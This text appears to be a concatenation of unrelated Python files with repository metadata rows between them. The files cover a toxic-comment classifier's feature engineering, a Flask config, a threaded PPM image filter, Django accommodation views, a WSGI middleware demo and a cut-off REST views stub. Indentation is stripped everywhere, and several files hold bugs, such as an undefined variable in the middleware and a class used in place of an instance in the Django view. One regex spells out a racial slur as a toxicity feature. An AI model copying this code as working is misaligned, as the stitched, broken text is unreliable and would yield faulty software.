clean = clean.replace("\t", " ")
clean = clean.replace("\b", " ")
clean = clean.replace("\r", " ")
# 3. Replace english contractions
for (pattern, repl) in patterns:
clean = re.sub(pattern, repl, clean)
# 4. Drop puntuation
# I could have used regex package with regex.sub(b"\p{P}", " ")
exclude = re.compile('[%s]' % re.escape(string.punctuation))
clean = " ".join([exclude.sub('', token) for token in clean.split()])
# 5. Drop numbers - as a scientist I don't think numbers are toxic ;-)
clean = re.sub("\d+", " ", clean)
# 6. Remove extra spaces - At the end of previous operations we multiplied space accurences
clean = re.sub('\s+', ' ', clean)
# Remove ending space if any
clean = re.sub('\s+$', '', clean)
# 7. Now replace words by words surrounded by # signs
# e.g. my name is bond would become #my# #name# #is# #bond#
# clean = re.sub(b"([a-z]+)", b"#\g<1>#", clean)
clean = re.sub(" ", "# #", clean) # Replace space
clean = "#" + clean + "#" # add leading and trailing #
return clean
def count_regexp_occ(regexp="", text=None):
""" Simple way to get the number of occurence of a regex"""
return len(re.findall(regexp, text))
def char_analyzer(text):
"""
This is used to split strings in small lots
I saw this in an article (I can't find the link anymore)
so <talk> and <talking> would have <Tal> <alk> in common
"""
tokens = text.split()
return [token[i: i + 3] for token in tokens for i in range(len(token) - 2)]
def get_indicators_and_clean_comments(df):
"""
Check all sorts of content as it may help find toxic comment
Though I'm not sure all of them improve scores
"""
# Count number of \n
df["ant_slash_n"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\n", x))
# Get length in words and characters
df["raw_word_len"] = df["comment_text"].apply(lambda x: len(x.split()))
df["raw_char_len"] = df["comment_text"].apply(lambda x: len(x))
# Check number of upper case, if you're angry you may write in upper case
df["nb_upper"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[A-Z]", x))
# Number of F words - f..k contains folk, fork,
df["nb_fk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[Ff]\S{2}[Kk]", x))
# Number of S word
df["nb_sk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[Ss]\S{2}[Kk]", x))
# Number of D words
df["nb_dk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[dD]ick", x))
# Number of occurence of You, insulting someone usually needs someone called : you
df["nb_you"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\W[Yy]ou\W", x))
# Just to check you really refered to my mother ;-)
df["nb_mother"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\Wmother\W", x))
# Just checking for toxic 19th century vocabulary
df["nb_ng"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\Wnigger\W", x))
# Some Sentences start with a <:> so it may help
df["start_with_columns"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"^\:+", x))
# Check for time stamp
df["has_timestamp"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\d{2}|:\d{2}", x))
# Check for dates 18:44, 8 December 2010
df["has_date_long"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\D\d{2}:\d{2}, \d{1,2} \w+ \d{4}", x))
# Check for date short 8 December 2010
df["has_date_short"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\D\d{1,2} \w+ \d{4}", x))
# Check for http links
df["has_http"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"http[s]{0,1}://\S+", x))
# check for mail
df["has_mail"] = df["comment_text"].apply(
lambda x: count_regexp_occ(r'[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+', x)
)
# Looking for words surrounded by == word == or """" word """"
df["has_emphasize_equal"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\={2}.+\={2}", x))
df["has_emphasize_quotes"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\"{4}\S+\"{4}", x))
# Now clean comments
df["clean_comment"] = df["comment_text"].apply(lambda x: prepare_for_char_n_gram(x))
# Get the new length in words and characters
df["clean_word_len"] = df["clean_comment"].apply(lambda x: len(x.split()))
df["clean_char_len"] = df["clean_comment"].apply(lambda x: len(x))
# Number of different characters used in a comment
# Using the f word only will reduce the number of letters required in the comment
df["clean_chars"] = df["clean_comment"].apply(lambda x: len(set(x)))
df["clean_chars_ratio"] = df["clean_comment"].apply(lambda x: len(set(x))) / df["clean_comment"].apply(
lambda x: 1 + min(99, len(x)))
get_indicators_and_clean_comments(df_train)
get_indicators_and_clean_comments(df_test)
with timer("Creating numerical features"):
num_features = [f_ for f_ in df_train.columns
if f_ not in ["comment_text", "clean_comment", "id", "remaining_chars",
'has_ip_address'] + label_name]
skl = MinMaxScaler()
train_num_features = csr_matrix(skl.fit_transform(df_train[num_features]))
test_num_features = csr_matrix(skl.fit_transform(df_test[num_features]))
# Get TF-IDF features
train_text = df_train['clean_comment']
test_text = df_test['clean_comment']
all_text = pd.concat([train_text, test_text])
# First on real words
with timer("Tfidf on word"):
word_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
analyzer='word',
token_pattern=r'\w{1,}',
stop_words='english',
ngram_range=(1, 2),
max_features=20000)
word_vectorizer.fit(all_text)
train_word_features = word_vectorizer.transform(train_text)
test_word_features = word_vectorizer.transform(test_text)
del word_vectorizer
gc.collect()
with timer("Tfidf on char n_gram"):
char_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
tokenizer=char_analyzer,
analyzer='word',
ngram_range=(1, 1),
max_features=50000)
char_vectorizer.fit(all_text)
train_char_features = char_vectorizer.transform(train_text)
test_char_features = char_vectorizer.transform(test_text)
del char_vectorizer
gc.collect()
print((train_char_features > 0).sum(axis=1).max())
del train_text
del test_text
gc.collect()
# Now stack TF IDF matrices
with timer("Staking matrices"):
csr_trn = hstack(
[
train_char_features,
train_word_features,
train_num_features
]
).tocsr()
# del train_word_features
del train_num_features
del train_char_features
gc.collect()
csr_sub = hstack(
[
test_char_features,
test_word_features,
test_num_features
]
).tocsr()
# del test_word_features
del test_num_features
del test_char_features
gc.collect()
submissions = pd.DataFrame.from_dict({'id': df_test['id']})
del df_test
gc.collect()
# now the training data
training = csr_trn
testing = csr_sub
import lightgbm as lgb
from lightgbm import LGBMModel
##get label
#label = df_train['toxic']
#
#train_data = lgb.Dataset(training,label = label)
#test_data = lgb.Dataset(testing)
#
##setting parameters
#param = {'num_leaves':31, 'objective':'binary'}
#param['metric'] = 'auc'
#num_round = 10
#bst = lgb.train(param, train_data, num_boost_round=num_round)
#print(bst.current_iteration())
#param['num_round'] = 20
#bst2 = lgb.train(param,train_data)
#print(bst2.current_iteration())
metric = metrics.log_loss
scoring = 'roc_auc'
metric_name = 'auc'
lgb_cls = lightgbm_CV(training.toarray(),df_train['toxic'],metric,metric_name=metric_name,scoring = scoring)
lgb_model = lgb_cls.cross_validation()
|
[
"guo_sc@foxmail.com"
] |
guo_sc@foxmail.com
|
4431d8c61a1bc8a36d28b03b20d34c0795ab0e84
|
6e7e1a23a96d7fc591cb33b230cc0d824cc84f40
|
/main/_config.py
|
9a3837f330c8caba03cc125daac315b775006896
|
[
"MIT"
] |
permissive
|
vprnet/town-meeting-day-2017
|
a1f8a0d8c2f90f14160053a5cda4b3ba68cea3cc
|
bc3f116995eb63f69aa89319554c3b5d235ac491
|
refs/heads/master
| 2020-05-30T09:18:10.813376
| 2017-03-07T13:24:24
| 2017-03-07T13:24:24
| 83,593,426
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
import os
import inspect
# Flask
DEBUG = True
# Amazon S3 Settings
AWS_KEY = ''
AWS_SECRET_KEY = ''
AWS_BUCKET = 'www.vpr.net'
# AWS_DIRECTORY = 'apps/town-meeting-day-2017/'
AWS_DIRECTORY = 'sandbox/town-meeting-day-2017/'
# Cache Settings (units in seconds)
STATIC_EXPIRES = 60 * 24 * 3600
HTML_EXPIRES = 3600
# Frozen Flask
FREEZER_DEFAULT_MIMETYPE = 'text/html'
FREEZER_IGNORE_MIMETYPE_WARNINGS = True
FREEZER_DESTINATION = 'build'
FREEZER_BASE_URL = 'http://%s/%s' % (AWS_BUCKET, AWS_DIRECTORY)
FREEZER_STATIC_IGNORE = ['Gruntfile*', 'node_modules', 'package.json',
'dev', '.sass-cache']
WEBFACTION_PATH = AWS_DIRECTORY
ABSOLUTE_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + '/'
|
[
"smbsimon@gmail.com"
] |
smbsimon@gmail.com
|
1de2fbb21ed15fac11022e56de6f6af56a44d490
|
85c90c5169f301e9528d3cda82344cdfa0acecec
|
/alumnos/58018-Valentin-Faraz/sv/hilos.py
|
5a3a2c6c624f2b1c512053d913b9844d0ec37212
|
[] |
no_license
|
valefaraz/lab
|
18836e4fa6e9827d42fde72eab98b1f4d07a884a
|
607cd9cb69d81da798773f0e6353c1a3abd1d1c2
|
refs/heads/master
| 2021-04-14T20:42:42.056332
| 2020-11-02T21:06:20
| 2020-11-02T21:06:20
| 249,264,906
| 0
| 0
| null | 2020-03-22T20:17:04
| 2020-03-22T20:17:03
| null |
UTF-8
|
Python
| false
| false
| 2,143
|
py
|
import os
from itertools import islice
from concurrent import futures
import time
from math import ceil
intensidad = 1
body_list = []
size=0
class Filtros_ppm():
def separar(self,imagen_read):
header=""
for i in imagen_read.splitlines():
header += i.decode()+"\n"
if i == b"255":
break
#print(header)
#print(len(header))
#header = imagen_read[:15].decode()
header = header.replace("P6","P3")
#body = imagen_read[len(header):]
return(header)
def rojo(self,start):
#global intensidad
#global body_list
#print(start)
for i in range(start,(start+size+3),3):
body_list[i] = ceil(body_list[i] * intensidad)
if body_list[i] > 255:
body_list[i]= 255
body_list[i+1] = 0
body_list[i+2] = 0
#print (body_ppm)
#return(body_list)
if __name__ == "__main__":
f=Filtros_ppm()
fd = open("dog.ppm","rb")
lectura=fd.read()
header_ppm=f.separar(lectura)
#print(header_ppm)
fd.seek(len(header_ppm))
#print(body_list)
body= fd.read()
fd.close()
body_list = [x for x in body]
size=100000
while True:
if size%3 !=0:
size += 1
if size%3 == 0:
break
#print(size)
#file_size = os.stat("dog.ppm").st_size
#print(file_size)
size_body_list=len(body_list)
#print(size_body_list)
n_threads= ceil(size_body_list/size)
print(n_threads)
a=list(range(0,size_body_list,size))
print(a)
hilos = futures.ThreadPoolExecutor(max_workers=n_threads)
resultado_a_futuro = hilos.map(f.rojo,a)
#print ((resultado_a_futuro))
#print(len(body_list))
body_ppm =""
c=0
for x in body_list:
c += 1
body_ppm += str(x) + " "
if c%9 == 0:
body_ppm += "\n"
imagen = open("rojelio.ppm", "w")
imagen.write(header_ppm + "\n")
imagen.write(body_ppm)
#print(body_ppm)
#print(cabecera_ppm)
|
[
"valefaraz@gmail.com"
] |
valefaraz@gmail.com
|
a7a398a1310d6976ccc249d2a15dc9f7d6ce8245
|
0b0dab57f920f52e6757857a3e5535e38ce86762
|
/count_dups.py
|
b604beb16572e6f6fd095e214875d66aea621a87
|
[] |
no_license
|
andrewtdinh/CodingBatExercises
|
ca3ce8d684d462920795e53b318aa399c621d6b7
|
baa65b4c1f60655fc3c0136b90cfe7ea83a08dbe
|
refs/heads/master
| 2016-08-12T05:09:04.691706
| 2015-11-26T04:46:32
| 2015-11-26T04:46:32
| 45,966,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
def count_dups(arr):
#This function will count the number of duplicates for each unique element in a list
return [(x, arr.count(x)) for x in set(arr)]
|
[
"andrewdinh74@yahoo.com"
] |
andrewdinh74@yahoo.com
|
479596553756a7493a9c3ba0c552c344f5045724
|
5f584c4bd49cdc2a1a2ec168766bff0934287f25
|
/project/accomodations/views.py
|
9cd842ad3de9c0fa071de2159e4288573a5c254b
|
[] |
no_license
|
akanimmashaba/ecowebsphere
|
f73991b03f821bbef6e21865e8928af0df006263
|
26b8381d3ab8c21e3df290b3a978adc3bc11370b
|
refs/heads/main
| 2023-09-01T12:18:51.897913
| 2021-10-23T11:43:53
| 2021-10-23T11:43:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,705
|
py
|
from django.shortcuts import redirect, render,get_object_or_404
from django.urls.base import reverse
from django.views.generic import ListView, CreateView,UpdateView,DeleteView
from django.views.generic.detail import DetailView
from .models import Accomodation,Address, Application
# from accounts.models import Profile
from django.db.models import Q
from django.urls import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
from .forms import AccomodationForm, AddressForm
from django.http import HttpResponseRedirect, request
from django.utils import timezone
from django.http import request
class CreateAccomodationView(CreateView):
model = Accomodation
form_class = AccomodationForm
template_name = 'Create-accomodation.html'
success_url = reverse_lazy('dashboard')
class DeleteAccomodationView(DeleteView):
model = Accomodation
template_name = 'delete-accomodation.html'
success_url = reverse_lazy('my-accomodations')
class AccomodationUpdateView(UpdateView):
model = Accomodation
form_class = AccomodationForm
template_name = 'update-accomodation.html'
class CreateAddressView(CreateView): # new
model = Address
form_class = AddressForm
template_name = 'Create-address.html'
success_url = reverse_lazy('create-accomodation')
class AccomodationCreateView(CreateView):
model = Accomodation
template_name = "Create-accomodation.html"
def AccomodationsList(request):
context = {
'object': Accomodation.objects.all()
}
return render(request, 'accomodation-list.html', context)
@login_required
def MyAccomodations(request):
context = {
'accomodations': Accomodation.objects.all().filter(owner=request.user)
}
return render(request, 'my-accomodations.html', context)
@login_required
def ViewReport(request, pk):
accomodation = get_object_or_404(Accomodation, pk=pk)
# accomodation_applications as accom_apps
applied_accomodations = accomodation.applied.all()
context = {
'applied_accomodations':applied_accomodations,
}
return render(request, 'report-page.html', context)
class ApplicationDetail(DetailView):
model = Application
template_name = 'applications.html'
@login_required
def Apply(request, pk):
accomodation = get_object_or_404(Accomodation, id=request.POST.get('accomodation_id'))
applied = False
if Accomodation.applied.filter(id=request.user.id).exists():
accomodation.applied.remove(request.user)
applied = False
else:
accomodation.applied.add(request.user)
applied = True
return HttpResponseRedirect(reverse('accomodation-detail', args=[str(pk)]))
class AccomodationList(ListView):
model = Accomodation
paginate_by = 10
template_name = 'home.html'
class AccomodationDetail(DetailView):
model = Accomodation
template_name = 'accommodation-detail.html'
class SearchResultsView(ListView):
model = Accomodation
template_name = 'search_results.html'
context_object_name = 'results'
def get_queryset(self):
query = self.request.GET.get('q')
object_list = Accomodation.objects.filter(
Q(title__icontains=query)
| Q(address__house_number__icontains=query)
| Q(address__house_number__icontains=query)
| Q(address__street_name__icontains=query)
| Q(address__provice__icontains=query)
| Q(address__locality__icontains=query)
| Q(address__municipality__icontains=query)
| Q(address__postal_code__icontains=query))
return object_list
|
[
"80892148+am-mashaba@users.noreply.github.com"
] |
80892148+am-mashaba@users.noreply.github.com
|
2e7fdf3b346ff8e3b362ae8d71c14ffa1a47c8e6
|
344c9c0f94eb84cfdcb7027bc645028cb38cb9f8
|
/oemgatewaylistener.py
|
764f8df45242717e478f55509525aed01ae6a2be
|
[] |
no_license
|
MarquisT/oem_gateway
|
5debf34deabc708e79e0e449e2b467a6f23e6f01
|
bf9f3f694e8fa6fe019def786ebfdb1f7c1f66d5
|
refs/heads/master
| 2020-04-05T23:39:52.627486
| 2013-06-25T08:30:38
| 2013-06-25T08:30:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,001
|
py
|
"""
This code is released under the GNU Affero General Public License.
OpenEnergyMonitor project:
http://openenergymonitor.org
"""
import serial
import time, datetime
import logging
import re
"""class OemGatewayListener
Monitors a data source.
This almost empty class is meant to be inherited by subclasses specific to
their data source.
"""
class OemGatewayListener(object):
def __init__(self):
# Initialize logger
self._log = logging.getLogger("OemGateway")
def close(self):
"""Close socket."""
pass
def read(self):
"""Read data from socket and process if complete line received.
Return data as a list: [NodeID, val1, val2]
"""
pass
def set(self, **kwargs):
"""Set configuration parameters.
**kwargs (dict): settings to be sent. Example:
{'setting_1': 'value_1', 'setting_2': 'value_2'}
"""
pass
def run(self):
"""Placeholder for background tasks.
Allows subclasses to specify actions that need to be done on a
regular basis. This should be called in main loop by instantiater.
"""
pass
"""class OemGatewayRFM2PiListener
Monitors the serial port for data from RFM2Pi
"""
class OemGatewayRFM2PiListener(OemGatewayListener):
def __init__(self, com_port):
# Initialization
super(OemGatewayRFM2PiListener, self).__init__()
# Serial port
self._log.debug('Opening serial port: %s', com_port)
try:
self._ser = serial.Serial(com_port, 9600, timeout = 0)
except serial.SerialException as e:
self._log.error(e)
raise OemGatewayListenerInitError('Could not open COM port %s' %
com_port)
# Initialize RX buffer
self._rx_buf = ''
# Initialize settings
self._settings = {'baseid': '', 'frequency': '', 'sgroup': '',
'sendtimeinterval': ''}
# Initialize time updata timestamp
self._time_update_timestamp = 0
def close(self):
"""Close socket."""
# Close serial port
if self._ser is not None:
self._log.debug("Closing serial port.")
self._ser.close()
def read(self):
"""Read data from socket and process if complete line received.
Return data as a list: [NodeID, val1, val2]
"""
# Read serial RX
self._rx_buf = self._rx_buf + self._ser.readline()
# If line incomplete, exit
if (self._rx_buf == '') or (self._rx_buf[len(self._rx_buf)-1] != '\n'):
return
# Otherwise, process line:
# Remove CR,LF
self._rx_buf = re.sub('\\r\\n', '', self._rx_buf)
# Log data
self._log.info("Serial RX: " + self._rx_buf)
# Get an array out of the space separated string
received = self._rx_buf.strip().split(' ')
# Empty serial_rx_buf
self._rx_buf = ''
# If information message, discard
if ((received[0] == '>') or (received[0] == '->')):
return
# Else, discard if frame not of the form
# [node val1_lsb val1_msb val2_lsb val2_msb ...]
# with number of elements odd and at least 3
elif ((not (len(received) & 1)) or (len(received) < 3)):
self._log.warning("Misformed RX frame: " + str(received))
# Else, process frame
else:
try:
received = [int(val) for val in received]
except Exception:
self._log.warning("Misformed RX frame: " + str(received))
else:
# Get node ID
node = received[0]
# Recombine transmitted chars into signed int
values = []
for i in range(1,len(received),2):
value = received[i] + 256 * received[i+1]
if value > 32768:
value -= 65536
values.append(value)
self._log.debug("Node: " + str(node))
self._log.debug("Values: " + str(values))
# Add data to send buffers
values.insert(0,node)
return values
def set(self, **kwargs):
"""Send configuration parameters to the RFM2Pi through COM port.
**kwargs (dict): settings to be modified. Available settings are
'baseid', 'frequency', 'sgroup'. Example:
{'baseid': '15', 'frequency': '4', 'sgroup': '210'}
"""
for key, value in kwargs.iteritems():
# If radio setting modified, transmit on serial link
if key in ['baseid', 'frequency', 'sgroup']:
if value != self._settings[key]:
self._settings[key] = value
self._log.info("Setting RFM2Pi | %s: %s" % (key, value))
string = value
if key == 'baseid':
string += 'i'
elif key == 'frequency':
string += 'b'
elif key == 'sgroup':
string += 'g'
self._ser.write(string)
# Wait a sec between two settings
time.sleep(1)
elif key == 'sendtimeinterval':
if value != self._settings[key]:
self._log.info("Setting send time interval to %s", value)
self._settings[key] = value
def run(self):
"""Actions that need to be done on a regular basis.
This should be called in main loop by instantiater.
"""
now = time.time()
# Broadcast time to synchronize emonGLCD
interval = int(self._settings['sendtimeinterval'])
if (interval): # A value of 0 means don't do anything
if (now - self._time_update_timestamp > interval):
self._send_time()
self._time_update_timestamp = now
def _send_time(self):
"""Send time over radio link to synchronize emonGLCD.
The radio module can be used to broadcast time, which is useful
to synchronize emonGLCD in particular.
Beware, this is know to garble the serial link on RFM2Piv1
sendtimeinterval defines the interval in seconds between two time
broadcasts. 0 means never.
"""
now = datetime.datetime.now()
self._log.debug("Broadcasting time: %d:%d" % (now.hour, now.minute))
self._ser.write("%02d,00,%02d,00,s" % (now.hour, now.minute))
"""class OemGatewayListenerInitError
Raise this when init fails.
"""
class OemGatewayListenerInitError(Exception):
pass
|
[
"jerome@antispam.fake"
] |
jerome@antispam.fake
|
a9429f499f86da380c35f20f7030daa4a35dd44d
|
d6ad0b5a7eb6dc621adc2d122378f8d39c6c041f
|
/app.py
|
d8d2548016a61a1c9c477f5ae33f952b3fc6d682
|
[] |
no_license
|
Praveen366/car_selling_prices
|
5917cc868ed6e02d22d6a31f4c16726dd291661a
|
b1d80734c62914ee05ae9f1af5e6f32014313166
|
refs/heads/master
| 2023-03-07T22:22:27.625174
| 2021-02-23T21:18:00
| 2021-02-23T21:18:00
| 341,679,337
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,971
|
py
|
# coding: utf-8
# In[ ]:
from flask import Flask, render_template, request
import jsonify
import requests
import pickle
import numpy as np
import sklearn
from sklearn.preprocessing import StandardScaler
app = Flask(__name__)
model = pickle.load(open('random_forest_regression_model.pkl', 'rb'))
@app.route('/',methods=['GET'])
def Home():
return render_template('index.html')
standard_to = StandardScaler()
@app.route("/predict", methods=['POST'])
def predict():
Fuel_Type_Diesel=0
if request.method == 'POST':
Year = int(request.form['Year'])
Present_Price=float(request.form['Present_Price'])
Kms_Driven=int(request.form['Kms_Driven'])
Kms_Driven2=np.log(Kms_Driven)
Owner=int(request.form['Owner'])
Fuel_Type_Petrol=request.form['Fuel_Type_Petrol']
if(Fuel_Type_Petrol=='Petrol'):
Fuel_Type_Petrol=1
Fuel_Type_Diesel=0
else:
Fuel_Type_Petrol=0
Fuel_Type_Diesel=1
Year=2020-Year
Seller_Type_Individual=request.form['Seller_Type_Individual']
if(Seller_Type_Individual=='Individual'):
Seller_Type_Individual=1
else:
Seller_Type_Individual=0
Transmission_Mannual=request.form['Transmission_Mannual']
if(Transmission_Mannual=='Mannual'):
Transmission_Mannual=1
else:
Transmission_Mannual=0
prediction=model.predict([[Present_Price,Kms_Driven2,Owner,Year,Fuel_Type_Diesel,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Mannual]])
output=round(prediction[0],2)
if output<0:
return render_template('index.html',prediction_texts="Sorry you cannot sell this car")
else:
return render_template('index.html',prediction_text="You Can Sell The Car at {}".format(output))
else:
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"noreply@github.com"
] |
Praveen366.noreply@github.com
|
2e4668d8c193a9ddbf9a0634f94a7dd600cbbaf1
|
2b1e34f363cca19c673e3f487074684efd1af868
|
/reviews and stars extraction.py
|
5a8f7c85dc88cf9574755ad51f3cca2e9990f1d8
|
[] |
no_license
|
Celty3910/how-consumer-reviews-affect-your-star-ratings
|
14f54bb1192c666725dd4b5bebc7adc4d26af32a
|
e6d68cb55bdb8ea49c7a9adb28c1fd7fb863871f
|
refs/heads/master
| 2020-03-10T23:20:26.418674
| 2018-05-02T02:51:00
| 2018-05-02T02:51:00
| 129,639,073
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,801
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 14:01:29 2018
@author: Lacey
"""
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
# the following part of code may takes at least half an hour to 3 hours depends on your machime.
# we don't run it over here
# but the out put is included in the folder
import subprocess
import json
import csv
import re
import codecs
import time
start_time = time.time()
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
from sklearn.preprocessing import normalize
from nltk.corpus import stopwords
############################################################
# NOTES:
# split big json into smaller chunks
# split -b 800mb review.json
#
# merge files into one
# cat *.csv >merged.csv
###################################################################################
# Step I. Filtering out the FOOD service related text reviews
##################################################################################
# we manully extract out the key words appeared in the food service categories
food_dict = ['Fast Food', 'Delis', 'Sandwiches', 'Soup', 'Steakhouses',
'Breakfasst & Brunch', 'Seafood', 'Sushi Bars', 'Donuts',
'Ice Cream & Frozen Yogurt', 'Cupcakes', 'Chicken Wings', 'Asian Fusion',
'Mexican', 'Chinese', 'American', 'Japanese', 'Canadian', 'French',
'Waffles','Juice','Bars','Smoothies','Hot Dogs','Fish','Chips',
'Bagels','Salad','Soup','Ramen','Vegetarian','Barbeque','Gluten-Free',
'Buffets','Cafes','Caterers']
data = {}
business_id =[]
categories = []
i = 0
print('\n')
print('Start reading business.json')
print('......')
print('\n')
with codecs.open('business.json','rU','utf-8') as json_file:
try:
for line in json_file:
line_contents = json.loads(line)
business_id.append(line_contents['business_id'])
categories.append(line_contents['categories'])
i += 1
#print (line_contents['business_id'], line_contents['categories'])
except UnicodeDecodeError:
print("failed to parse data")
pass
print('finish reading business.json')
print('\n')
# make a dictionary that business_id as keys and
# the corresponding categories as values
data = dict(zip(business_id, categories))
food_data = {}
food_id = []
#food_categories = []
# filter out all FOOD related services
for business_id, categories in data.items():
for elem in food_dict:
if elem in categories:
food_id.append(business_id)
#food_categories.append(categories)
#food_data = dict(zip(food_id, food_categories))
print (len(food_id))
review_busi_id =[]
review_text = []
stars = []
#j = 0
print('Start reading reviews.json')
print('......')
# extract only the text review and its corresponding text review part
with codecs.open('review.json','rU','utf-8') as json_file:
try:
for l in json_file:
l_contents = json.loads(l)
review_busi_id.append(l_contents['business_id'])
review_text.append(l_contents['text'])
stars.append(l_contents['stars'])
#j += 1
#print (j, l_contents['text'])
#print ("\n")
#print ('size: ', len(review_text))
except UnicodeDecodeError:
print("failed to parse data")
pass
print('\n')
print('finish reading reviews.json')
print('\n')
print('Start saving food_reviews.csv')
print('......')
# dictionary with b_id as keys and b_text as values
review_data = dict(zip(review_busi_id, review_text))
review_stars = dict(zip(review_busi_id, stars))
f_1 = csv.writer(open('food_reviews_1.csv','w'))
f_2 = csv.writer(open('food_reviews_2.csv','w'))
#output1 = []
idx = 0
# only FOOD-service related reviews
for id in food_id:
for review_busi_id, review_text in review_data.items():
if review_busi_id == id:
print (idx, review_busi_id)
f_1.writerow([review_busi_id,review_text])
#output1.append(review_text)
print (idx, review_text)
idx += 1
print ('\n')
for review_bid, stars in review_stars.items():
if review_id == id:
print (idx, review_busi_id)
f_2.writerow([review_busi_id,stars])
#output1.append(review_text)
print (idx, stars)
#idx += 1
print ('\n')
#f.close()
#print output1
#print('\n')
#print('finish saving food_reviews.csv')
#print('\n')
|
[
"noreply@github.com"
] |
Celty3910.noreply@github.com
|
68c64467b3fce1da542079095af7de59d545a2b5
|
55e24943297bb106b2f431b0e6f5990131772ea0
|
/backend/api/v1/__init__.py
|
39fcc71a89e295c07dcbea637c82276899f896ad
|
[] |
no_license
|
maangulo12/starter-kit
|
4464ed04dedd4a6e2c554da2a98f2da09674a33b
|
a78a05f38d9c89b9a91b9bf8521b3518f8c02154
|
refs/heads/master
| 2023-05-10T21:28:31.416774
| 2019-11-14T04:24:48
| 2019-11-14T04:24:48
| 70,211,873
| 10
| 2
| null | 2023-05-02T18:29:06
| 2016-10-07T03:15:01
|
Python
|
UTF-8
|
Python
| false
| false
| 178
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
backend.api.v1
~~~~~~~~~~~~~~
This package contains the API v1 endpoints of this application.
"""
URL = '/api/v1'
|
[
"maangulo12@gmail.com"
] |
maangulo12@gmail.com
|
137b6286f0943e71c7aecacf034efc1a6a9116bd
|
f34447a590fb160a09b95c03aea2106d8521acaf
|
/004.py
|
8a16579aae3903285394ee5caa17c86a0ff6b157
|
[] |
no_license
|
skd1729/Project-Euler-Solutions
|
1f4506bacc061b395af784d6253119564a908e41
|
e9a1a3dca636fbaad7bb2faac095dd40597a5078
|
refs/heads/master
| 2020-12-30T09:37:40.472933
| 2017-09-24T22:36:20
| 2017-09-24T22:36:20
| 100,424,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
p=[]
for x in range(100,1000):
for i in range(x*100,x*1000,x):
a=[int(i) for i in str(i)]
if (a==a[::-1]):
#print a
num = int(''.join(map(str,a)))
p.append(num)
p.sort()
print p[-1]
|
[
"noreply@github.com"
] |
skd1729.noreply@github.com
|
b7a522982fc0326be5a4bac3a315f3ae636c11ee
|
631fd4f51e66d0a6dbbe65f2a9191f6cb1a29946
|
/serv.py
|
f976c43d9a2bb9de0a071f0cf0d190e0fb47ebfd
|
[] |
no_license
|
sorryiambizzy/web_laba4
|
4db3c2a91b2572c02a50aa35b23a1c36bcb56d15
|
bf3e425f56ea44d4589d52a0b23eaede0780aa4f
|
refs/heads/master
| 2021-05-06T15:31:34.825761
| 2017-12-08T19:23:37
| 2017-12-08T19:23:37
| 113,581,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
from webob import Request, Response
from jinja2 import Environment, FileSystemLoader
assets = [
'app.js',
'react.js',
'leaflet.js',
'D3.js',
'moment.js',
'math.js',
'main.css',
'bootstrap.css',
'normalize.css',
]
css = []
js = []
for element in assets:
element_split = element.split('.')
if element_split[1] == 'js':
js.append(element)
elif element_split[1] == 'css':
css.append(element)
class WsgiTopBottomMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
response = self.app(environ, start_response).decode()
if response.find('<head>' and '<body>') > -1:
html, head = response.split('<head>')
datahead, body = head.split('</head>')
head1, bodytag = body.split('<body>')
databody, end = bodytag.split('</body>')
yield (html + data + end).encode()
else:
yield (response).encode()
def app(environ, start_response):
response_code = '200 OK'
response_type = ('Content-Type', 'text/HTML')
start_response(response_code, [response_type])
return ''''''
app = WsgiTopBottomMiddleware(app)
request = Request.blank('/index.html')
env = Environment(loader=FileSystemLoader('.'))
template = env.get_template('index.html')
print(template.render(javascripts=js, styles=css))
print(request.get_response(app))
|
[
"noreply@github.com"
] |
sorryiambizzy.noreply@github.com
|
eb62ed975e122b3739a6c76235afc7ec58481491
|
65a42ef4a18e0054bc2d0822b073a9253e9427f2
|
/backend/api/views.py
|
3274e8571e441bba23632fdcb505a6b2d4a8a83e
|
[] |
no_license
|
hjalti/maulrater
|
bcca76146d947adb710951035caeefafcb989e34
|
5669612116e32e21bced9b157ad9241290d90c65
|
refs/heads/master
| 2021-08-14T10:18:57.033475
| 2019-12-05T12:24:21
| 2019-12-05T12:24:21
| 210,585,605
| 0
| 0
| null | 2021-08-11T12:28:14
| 2019-09-24T11:26:32
|
Vue
|
UTF-8
|
Python
| false
| false
| 352
|
py
|
from rest_framework import generics
from api.serializers import RatingSerializer, RestaurantSerializer
from api.models import Restaurant
